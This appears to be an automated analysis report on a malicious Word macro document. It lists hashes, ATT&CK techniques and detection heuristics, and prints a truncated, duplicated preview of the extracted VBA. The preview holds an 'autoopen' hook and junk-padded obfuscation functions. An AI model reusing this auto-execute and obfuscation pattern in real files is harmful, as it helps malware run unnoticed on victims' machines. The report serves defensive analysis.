Office (OLE) malware analysis — malicious · d9c9e1fece032140

MALICIOUS

Office (OLE)

89.0 KB Created: 2017-08-31 13:22:00 Authoring application: Microsoft Office Word First seen: 2018-06-20

MD5: 890ce730a3cf43f43039f114744df924 SHA-1: 19142bb0a5cdb0a7ad3520d1693ef5f3761d6d9a SHA-256: d9c9e1fece032140a4754096b08a4eb147598a36f8b582c796b8764ff6cd9a91

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The 'autoopen' subroutine is present, and the macro utilizes the Shell() function, indicating an attempt to execute arbitrary commands. This is a common technique for downloading and executing further malicious content. The ClamAV detection 'Doc.Macro.DollarShell-6346616-0' further supports this assessment.

Heuristics 6

ClamAV: Doc.Macro.DollarShell-6346616-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15175 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	15175 bytes
SHA-256: `a3b789a377a46bddf4c208fa481a93597586390e694508658a317f43998fd736`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Sub autoopen() mFAVwZDEr End Sub Function KvRCBMNS() Dim LMymZeBnT(2529) LMymZeBnT(1446) = 8729 + 4015 / 7486 / 6644 / 2785 - 4156 + 1671 + 1621 LMymZeBnT(175) = 6727 + 3749 / 2084 / 6651 / 2226 - 4594 - 2193 + 7969 LMymZeBnT(561) = Bvhvbny LMymZeBnT(2449) = GrgGzTyygzg LMymZeBnT(1799) = kDeGvDeHBEd LMymZeBnT(765) = MwASNGy LMymZeBnT(2210) = VcVCSVcBZGR LMymZeBnT(2285) = pSsyLnr LMymZeBnT(1072) = LaCbgNn LMymZeBnT(138) = XGZbySUN LMymZeBnT(2342) = PrUzZbaXhNR LMymZeBnT(763) = zErXbTBtP LMymZeBnT(239) = HdtwfkN LMymZeBnT(2464) = dppBDCapf LMymZeBnT(2404) = UTNnrHvZh LMymZeBnT(435) = zhnYZsSx End Function Function zxkKZatS() Dim MUSDsdTpm(8023) MUSDsdTpm(1547) = 8507 + 3715 + 7390 / 1139 - 7686 - 1394 - 3729 + 5591 + 6346 + 3830 MUSDsdTpm(5496) = 3179 + 1176 / 7152 - 7866 + 8387 + 7334 + 3666 MUSDsdTpm(6901) = 3699 + 464 / 2847 / 8537 - 1494 - 4533 - 7135 + 5793 + 991 MUSDsdTpm(2356) = BNVUASu MUSDsdTpm(5811) = pfxyacFHhV MUSDsdTpm(4778) = nfcVuNST MUSDsdTpm(3553) = KKsAPpcZpey MUSDsdTpm(6172) = GgertpH MUSDsdTpm(3112) = ecTDmEyRUr MUSDsdTpm(4214) = aNmezFdLCmu MUSDsdTpm(6856) = HcfUURfCg MUSDsdTpm(2833) = WuNtuvWUw MUSDsdTpm(2854) = xBwvyYZeNk MUSDsdTpm(818) = KuCetnGYMS MUSDsdTpm(3710) = ADEFKKLExy MUSDsdTpm(6523) = caNmUmfBS MUSDsdTpm(7145) = TDDMxWGeV MUSDsdTpm(4932) = nAYPVLTzHP MUSDsdTpm(4723) = MUnbKhhrM MUSDsdTpm(2494) = zLeZyXb MUSDsdTpm(4785) = aUUbaHB MUSDsdTpm(6003) = eLEUnGcHkTH MUSDsdTpm(4097) = FgbKwZMY MUSDsdTpm(2916) = tnckDDSYY MUSDsdTpm(4307) = WHTZHaev MUSDsdTpm(6864) = chDaYNWmP MUSDsdTpm(2193) = zXxtNNRpD MUSDsdTpm(2563) = sbAXRGR MUSDsdTpm(6124) = PruYVpHa MUSDsdTpm(4923) = VMSzhbAdrVP MUSDsdTpm(3938) = bBzmAYNDR MUSDsdTpm(1034) = BgFXfTr MUSDsdTpm(2729) = xtFvsAKB End Function Function vwewdzmCG() Dim dEUUeywwRMF(9690) dEUUeywwRMF(741) = 1224 + 2152 + 5852 + 9540 / 2903 / 6527 - 9406 - 4708 + 1567 + 2937 dEUUeywwRMF(7976) = 1014 + 7679 + 3864 + 1676 / 5996 / 3882 - 161 - 4895 + 4065 + 6909 dEUUeywwRMF(1751) = tYazbXxCNT dEUUeywwRMF(2776) = NuDCsTAPLPk dEUUeywwRMF(1652) = ebvDZPdpZsy dEUUeywwRMF(4913) = CUNZMYe dEUUeywwRMF(8863) = muZhmRr dEUUeywwRMF(5853) = uGsbefvYXRP dEUUeywwRMF(9372) = GsVazkZS dEUUeywwRMF(3478) = wUmUtLhPy dEUUeywwRMF(5719) = egzYLLVHD dEUUeywwRMF(3811) = RwfzfLZysD dEUUeywwRMF(9051) = ttdrMdsmykS dEUUeywwRMF(9395) = ztXFkXHNseL dEUUeywwRMF(1518) = cvYaAvhk dEUUeywwRMF(4598) = PNWXuHhs dEUUeywwRMF(2545) = svkArnN dEUUeywwRMF(7865) = szvzSgamBf dEUUeywwRMF(7016) = hDwHTMuptC dEUUeywwRMF(6991) = WMZUUYPwhZ dEUUeywwRMF(542) = hpWXAwLmLYv dEUUeywwRMF(2487) = HBeVWrpAB dEUUeywwRMF(4899) = CPRYAdHwkTZ dEUUeywwRMF(8603) = mFCdEgmrgr dEUUeywwRMF(878) = YWPDTErH dEUUeywwRMF(8488) = vnMHNnRnT dEUUeywwRMF(9551) = WnPmpFADzEX dEUUeywwRMF(9252) = azxrthzrfP dEUUeywwRMF(5148) = rmYSZsceykH dEUUeywwRMF(8137) = MEfWGVkRHfT dEUUeywwRMF(9256) = AMvBduVrX dEUUeywwRMF(1474) = CSERTFBTLe End Function Function VWLBafszR() Dim RutsTCMXc(5215) RutsTCMXc(2810) = 8562 + 4583 / 4600 / 3484 - 5235 + 7632 + 2021 + 4246 RutsTCMXc(2322) = 2401 + 8364 / 9723 / 8683 - 2930 - 2116 - 6859 + 2276 RutsTCMXc(1777) = muWFmKYxd RutsTCMXc(3509) = RnXZbXGP RutsTCMXc(2132) = uFYaLHHRa RutsTCMXc(2659) = MVxPwWed RutsTCMXc(1382) = MfBFrLSEZsF RutsTCMXc(279) = epAYkRUaV RutsTCMXc(2919) = rBAPsgdUZ RutsTCMXc(1271) = BydDuUZ RutsTCMXc(4350) = eXPPkeHc RutsTCMXc(4191) = CTKSnCpP RutsTCMXc(4786) = BNYVMbtApGu RutsTCMXc(531) = xGnSxTRUCVa RutsTCMXc(622) = dYWMfDUyyK RutsTCMXc(301) = aGVZYRSnx RutsTCMXc(3437) = bEGAMUGxvgk RutsTCMXc(3741) = KxxfKfX RutsTCMXc(1193) = ptuahxcHBz RutsTCMXc(1852) = rmCaPECXAu RutsTC ... (truncated)

SHA-256: a3b789a377a46bddf4c208fa481a93597586390e694508658a317f43998fd736

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub autoopen()
mFAVwZDEr
End Sub

Function KvRCBMNS()
Dim LMymZeBnT(2529)
LMymZeBnT(1446) = 8729 + 4015 / 7486 / 6644 / 2785 - 4156 + 1671 + 1621
 LMymZeBnT(175) = 6727 + 3749 / 2084 / 6651 / 2226 - 4594 - 2193 + 7969
LMymZeBnT(561) = Bvhvbny
 LMymZeBnT(2449) = GrgGzTyygzg
 LMymZeBnT(1799) = kDeGvDeHBEd
 LMymZeBnT(765) = MwASNGy
 LMymZeBnT(2210) = VcVCSVcBZGR
 LMymZeBnT(2285) = pSsyLnr
 LMymZeBnT(1072) = LaCbgNn
 LMymZeBnT(138) = XGZbySUN
 LMymZeBnT(2342) = PrUzZbaXhNR
 LMymZeBnT(763) = zErXbTBtP
 LMymZeBnT(239) = HdtwfkN
 LMymZeBnT(2464) = dppBDCapf
 LMymZeBnT(2404) = UTNnrHvZh
 LMymZeBnT(435) = zhnYZsSx
End Function
Function zxkKZatS()
Dim MUSDsdTpm(8023)
MUSDsdTpm(1547) = 8507 + 3715 + 7390 / 1139 - 7686 - 1394 - 3729 + 5591 + 6346 + 3830
 MUSDsdTpm(5496) = 3179 + 1176 / 7152 - 7866 + 8387 + 7334 + 3666
 MUSDsdTpm(6901) = 3699 + 464 / 2847 / 8537 - 1494 - 4533 - 7135 + 5793 + 991
MUSDsdTpm(2356) = BNVUASu
 MUSDsdTpm(5811) = pfxyacFHhV
 MUSDsdTpm(4778) = nfcVuNST
 MUSDsdTpm(3553) = KKsAPpcZpey
 MUSDsdTpm(6172) = GgertpH
 MUSDsdTpm(3112) = ecTDmEyRUr
 MUSDsdTpm(4214) = aNmezFdLCmu
 MUSDsdTpm(6856) = HcfUURfCg
 MUSDsdTpm(2833) = WuNtuvWUw
 MUSDsdTpm(2854) = xBwvyYZeNk
 MUSDsdTpm(818) = KuCetnGYMS
 MUSDsdTpm(3710) = ADEFKKLExy
 MUSDsdTpm(6523) = caNmUmfBS
 MUSDsdTpm(7145) = TDDMxWGeV
 MUSDsdTpm(4932) = nAYPVLTzHP
 MUSDsdTpm(4723) = MUnbKhhrM
 MUSDsdTpm(2494) = zLeZyXb
 MUSDsdTpm(4785) = aUUbaHB
 MUSDsdTpm(6003) = eLEUnGcHkTH
 MUSDsdTpm(4097) = FgbKwZMY
 MUSDsdTpm(2916) = tnckDDSYY
 MUSDsdTpm(4307) = WHTZHaev
 MUSDsdTpm(6864) = chDaYNWmP
 MUSDsdTpm(2193) = zXxtNNRpD
 MUSDsdTpm(2563) = sbAXRGR
 MUSDsdTpm(6124) = PruYVpHa
 MUSDsdTpm(4923) = VMSzhbAdrVP
 MUSDsdTpm(3938) = bBzmAYNDR
 MUSDsdTpm(1034) = BgFXfTr
 MUSDsdTpm(2729) = xtFvsAKB
End Function
Function vwewdzmCG()
Dim dEUUeywwRMF(9690)
dEUUeywwRMF(741) = 1224 + 2152 + 5852 + 9540 / 2903 / 6527 - 9406 - 4708 + 1567 + 2937
 dEUUeywwRMF(7976) = 1014 + 7679 + 3864 + 1676 / 5996 / 3882 - 161 - 4895 + 4065 + 6909
dEUUeywwRMF(1751) = tYazbXxCNT
 dEUUeywwRMF(2776) = NuDCsTAPLPk
 dEUUeywwRMF(1652) = ebvDZPdpZsy
 dEUUeywwRMF(4913) = CUNZMYe
 dEUUeywwRMF(8863) = muZhmRr
 dEUUeywwRMF(5853) = uGsbefvYXRP
 dEUUeywwRMF(9372) = GsVazkZS
 dEUUeywwRMF(3478) = wUmUtLhPy
 dEUUeywwRMF(5719) = egzYLLVHD
 dEUUeywwRMF(3811) = RwfzfLZysD
 dEUUeywwRMF(9051) = ttdrMdsmykS
 dEUUeywwRMF(9395) = ztXFkXHNseL
 dEUUeywwRMF(1518) = cvYaAvhk
 dEUUeywwRMF(4598) = PNWXuHhs
 dEUUeywwRMF(2545) = svkArnN
 dEUUeywwRMF(7865) = szvzSgamBf
 dEUUeywwRMF(7016) = hDwHTMuptC
 dEUUeywwRMF(6991) = WMZUUYPwhZ
 dEUUeywwRMF(542) = hpWXAwLmLYv
 dEUUeywwRMF(2487) = HBeVWrpAB
 dEUUeywwRMF(4899) = CPRYAdHwkTZ
 dEUUeywwRMF(8603) = mFCdEgmrgr
 dEUUeywwRMF(878) = YWPDTErH
 dEUUeywwRMF(8488) = vnMHNnRnT
 dEUUeywwRMF(9551) = WnPmpFADzEX
 dEUUeywwRMF(9252) = azxrthzrfP
 dEUUeywwRMF(5148) = rmYSZsceykH
 dEUUeywwRMF(8137) = MEfWGVkRHfT
 dEUUeywwRMF(9256) = AMvBduVrX
 dEUUeywwRMF(1474) = CSERTFBTLe
End Function
Function VWLBafszR()
Dim RutsTCMXc(5215)
RutsTCMXc(2810) = 8562 + 4583 / 4600 / 3484 - 5235 + 7632 + 2021 + 4246
 RutsTCMXc(2322) = 2401 + 8364 / 9723 / 8683 - 2930 - 2116 - 6859 + 2276
RutsTCMXc(1777) = muWFmKYxd
 RutsTCMXc(3509) = RnXZbXGP
 RutsTCMXc(2132) = uFYaLHHRa
 RutsTCMXc(2659) = MVxPwWed
 RutsTCMXc(1382) = MfBFrLSEZsF
 RutsTCMXc(279) = epAYkRUaV
 RutsTCMXc(2919) = rBAPsgdUZ
 RutsTCMXc(1271) = BydDuUZ
 RutsTCMXc(4350) = eXPPkeHc
 RutsTCMXc(4191) = CTKSnCpP
 RutsTCMXc(4786) = BNYVMbtApGu
 RutsTCMXc(531) = xGnSxTRUCVa
 RutsTCMXc(622) = dYWMfDUyyK
 RutsTCMXc(301) = aGVZYRSnx
 RutsTCMXc(3437) = bEGAMUGxvgk
 RutsTCMXc(3741) = KxxfKfX
 RutsTCMXc(1193) = ptuahxcHBz
 RutsTCMXc(1852) = rmCaPECXAu
 RutsTC
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.